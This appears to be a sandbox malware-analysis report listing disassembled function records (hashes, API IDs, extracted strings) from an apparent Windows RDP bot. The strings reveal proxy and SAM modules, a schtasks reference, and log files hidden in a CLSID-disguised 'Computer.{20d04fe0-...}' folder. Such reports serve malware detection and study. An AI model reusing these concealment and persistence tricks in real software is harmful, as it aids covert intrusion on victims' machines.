    • Instruction ID: 68de696d32e432520cb50128b6f5b2ef8b0c9cc4273b12e9ebb9bd6698170281
    • Opcode Fuzzy Hash: 7b861545304d1f514fcde138a12ecea94f5104ea430eaf2499474c994248ce49
    • Instruction Fuzzy Hash: 6941A563A1C64783FF218F54E8103B51359BF50788F894932E54EEB696DF3E9506E30A
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
    • String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
    • API String ID: 2278979430-4175654481
    • Opcode ID: 3b89421958d52078f8a9eb330a66aaaf8ef7693b0d34dd29c2a1c9dbed56fd08
    • Instruction ID: b6b933031a4ab3751aafd369fe97d46078800be1985e0491988af5be9fbd681c
    • Opcode Fuzzy Hash: 3b89421958d52078f8a9eb330a66aaaf8ef7693b0d34dd29c2a1c9dbed56fd08
    • Instruction Fuzzy Hash: 9151D432A08E428DE7608F16E4403BD6661AF64BB4F5403B1D97DA7AF4DF3DA4858748
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: strcmp
    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
    • API String ID: 1004003707-636894343
    • Opcode ID: ca8257f240634362d907ca62f945855cab86a0ad3e33b996e55cc55cc56bf155
    • Instruction ID: b796d88c5fff3b49a2ab394f799c7fc57980797b21f623c357f7b7962e2ed13c
    • Opcode Fuzzy Hash: ca8257f240634362d907ca62f945855cab86a0ad3e33b996e55cc55cc56bf155
    • Instruction Fuzzy Hash: 17412B61A08E87D5FB118B92EC407FA6268BF14778F8451B2EA5D466B5DF3CF686C300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: strcmp
    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
    • API String ID: 1004003707-636894343
    • Opcode ID: 742cb9653fd0ad3aff0f6e044d72628a2f3de24e1281dc64340fde31186560a7
    • Instruction ID: f469b7f5f526bd470160956c58f46669c6331aefc09ee7df585b855cc985d0a5
    • Opcode Fuzzy Hash: 742cb9653fd0ad3aff0f6e044d72628a2f3de24e1281dc64340fde31186560a7
    • Instruction Fuzzy Hash: A94118B2B48757A5FA319F41A8003B52260FF54348F454137EADD062B5EF3CE946CB40
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: strcmp
    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
    • API String ID: 1004003707-4168131722
    • Opcode ID: b9a5b62eeed4ec33f15ac3aa3c5af3d3b5ff9886a836c37ee15008104cbda270
    • Instruction ID: 9431da4d8dd06d96ad015239a4f405ca71f6d12f8f479fe5b65aa5fa975d40bd
    • Opcode Fuzzy Hash: b9a5b62eeed4ec33f15ac3aa3c5af3d3b5ff9886a836c37ee15008104cbda270
    • Instruction Fuzzy Hash: 69414C61A08E47D5FF109B92EC407BA2668BB007B9F8951B2EA0D0A5B5DF3CF546C300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: strcmp
    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
    • API String ID: 1004003707-4168131722
    • Opcode ID: 9816e447e7e3194d1c9b6184257d6a810cff5aed84435c36a4eb998814ab8e6f
    • Instruction ID: 98d13fa092de0a48ffb24caf2383e74d790d2627eeb30d1de52feca737ba6eb9
    • Opcode Fuzzy Hash: 9816e447e7e3194d1c9b6184257d6a810cff5aed84435c36a4eb998814ab8e6f
    • Instruction Fuzzy Hash: C5413AA2B4869795FB319F10E9507B52760EF04348F444037DBAD1A5B5EF3CEA86CB80
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
    • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
    • API String ID: 285244410-4028107517
    • Opcode ID: 291142d81ef434520bdb933ceb25b87e517fa9dffd9c2c209eb7851062019824
    • Instruction ID: 7facc3837eee24a91bc1db289b0a0ac9ca34d00811b0f17d5ddb6d215752a89b
    • Opcode Fuzzy Hash: 291142d81ef434520bdb933ceb25b87e517fa9dffd9c2c209eb7851062019824
    • Instruction Fuzzy Hash: 68311AE1F0AA1391FE109B65E8503B93261AF54B94F688437C9EE073B1EE6CE849D300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
    • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
    • API String ID: 285244410-4028107517
    • Opcode ID: d69d95a9037998ea9d55a3f879b52a6b415f76345e9f6d05a7bfa38e9cfa1026
    • Instruction ID: 224ce861d8ba752641a6ffe2c55b9ab29b9d486c6f7a402d1c1c1a84f81ebe9d
    • Opcode Fuzzy Hash: d69d95a9037998ea9d55a3f879b52a6b415f76345e9f6d05a7bfa38e9cfa1026
    • Instruction Fuzzy Hash: BE311760A09E5B8AFE15CB07FC507B82361AF94BB4F5954B5C89D0B2F4DEACEC468300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
    • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
    • API String ID: 285244410-4028107517
    • Opcode ID: ebd8fcc64d933084694a81540a001398604d55b1fac6c176a105ccde501d93e9
    • Instruction ID: b434df4a935cce83956eb79d88abe8419ab3e05745c9d30919156994271ff692
    • Opcode Fuzzy Hash: ebd8fcc64d933084694a81540a001398604d55b1fac6c176a105ccde501d93e9
    • Instruction Fuzzy Hash: 8B31F061E09E1381FF209B87EC503B72269AF54BB4F8995B5C85D1B3B0EE2DF9458311
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
    • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
    • API String ID: 285244410-4028107517
    • Opcode ID: f893431315517b8711a2f39384f10b18d2cbf81734ed661565f6744c24cef636
    • Instruction ID: a3e87018d03f5a9ca89b6e9df1e12737d68795f0bc93d1f11651af4112d4a378
    • Opcode Fuzzy Hash: f893431315517b8711a2f39384f10b18d2cbf81734ed661565f6744c24cef636
    • Instruction Fuzzy Hash: 70314FA1E0DA1791FA509B05E9503782361BF44B94F998077C8DD173B2EF3CE885C380
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
    • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
    • API String ID: 285244410-4028107517
    • Opcode ID: 338f8187a01994cb9cc934b0509026c158a5ea929753fa03b13dbe449a071cf6
    • Instruction ID: e86e039b9f15dd2f629bf91997b3fe8c92c8e17a50e69153bf053504b6c5477b
    • Opcode Fuzzy Hash: 338f8187a01994cb9cc934b0509026c158a5ea929753fa03b13dbe449a071cf6
    • Instruction Fuzzy Hash: 203105A2E0AB0391FA319F59E8503B563A1AF44B84F584536C9CD0B3B9DE3DE885CF00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
    • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
    • API String ID: 3179112426-3318474754
    • Opcode ID: d4087715ac728586b0a18dc565e1120c5aeb35055bc36e4b57be2449171424a3
    • Instruction ID: 4002924a9d215b2bdc82155d30926d9a9def16eb756e83d580de9f96c2d713df
    • Opcode Fuzzy Hash: d4087715ac728586b0a18dc565e1120c5aeb35055bc36e4b57be2449171424a3
    • Instruction Fuzzy Hash: 6531E461E0D70792FB205714A8C03B922609F19755F620937C5CE672B3EE5EBC899386
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
    • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
    • API String ID: 3179112426-2019511216
    • Opcode ID: 4f90daaba108dc173a0be6130785b812efb8f36d3d4053fda1212b8c00ddd165
    • Instruction ID: bd48a908e3f710cda52b85e55efa097dbe5e77336bc2a0cf798a904755b36431
    • Opcode Fuzzy Hash: 4f90daaba108dc173a0be6130785b812efb8f36d3d4053fda1212b8c00ddd165
    • Instruction Fuzzy Hash: 1531F650F0D70392FB605764E4D03BD3268AF89354F200537C5DE4A2FAEE9EA999D382
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: strlen$strcpy
    • String ID: *$schtasks
    • API String ID: 2790333442-2394224502
    • Opcode ID: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
    • Instruction ID: 2afa21938add3fb70f621cd6096b6cea3342bc80b378d6b85b2ced1f7d4c0995
    • Opcode Fuzzy Hash: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
    • Instruction Fuzzy Hash: 4F5183A2A0CB8385F771AE55E4513BA5691EBC5384F980035EACE473F6DE7CE9058F10
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: CriticalHeapSectionmemcpy$AllocEnterLeaveProcessSleepfflushfwriterecv
    • String ID: [D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$routine_rx
    • API String ID: 3537583691-1494920791
    • Opcode ID: f5fe8b67ae239f4394970cf3ed24f4d58279fb7353ba1ab73c9d33bbdb2da9c9
    • Instruction ID: 8b33125fe05e082d787c1984e0ce112b3cba66588694dddcca8196f5e357ea21
    • Opcode Fuzzy Hash: f5fe8b67ae239f4394970cf3ed24f4d58279fb7353ba1ab73c9d33bbdb2da9c9
    • Instruction Fuzzy Hash: 1141B165A09E0299EA108F12E84037E27A1FB64BB4F5446B5E92D67BB4DF3CE585C308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
    • String ID: .$1$:$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
    • API String ID: 513531256-1867875793
    • Opcode ID: 0865605239ea0c2a81fc5edc76914eb3e91c8f90c759d8de733d668bac4a86af
    • Instruction ID: f139f6e78592a36614b306c4834eee6994eefef2fe794ec39fc18c70afaec81f
    • Opcode Fuzzy Hash: 0865605239ea0c2a81fc5edc76914eb3e91c8f90c759d8de733d668bac4a86af
    • Instruction Fuzzy Hash: AE414CB5A0C74686F720AB21F8553AA72A1EB94790F440036EACD57BB6CF3CE5858741
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$kernel32
    • API String ID: 513531256-1037688549
    • Opcode ID: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
    • Instruction ID: 928e3ad3256a7e5c3d542f1af26f378823af203553ce9fec49b5a7fdf1b48f3e
    • Opcode Fuzzy Hash: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
    • Instruction Fuzzy Hash: 6B417361A0C68686F3209B15E9503BA6361FF88B84F540137DACD87BB6DF3CE685C780
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
    • API String ID: 513531256-4171087551
    • Opcode ID: cb16032770b0f91297386cbf193347fe0b5cb319d835ba3c30b3a51f3a6e6d65
    • Instruction ID: a4d8f3627eaffa6bcff5f351584542592a90f8b1f0dec8da3a2c6207fade5caf
    • Opcode Fuzzy Hash: cb16032770b0f91297386cbf193347fe0b5cb319d835ba3c30b3a51f3a6e6d65
    • Instruction Fuzzy Hash: 3241C033A1C64287F7209B65E8513BA6358FF94780F440431EA0DE3796CF3EE681A74A
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: _errno$strtol
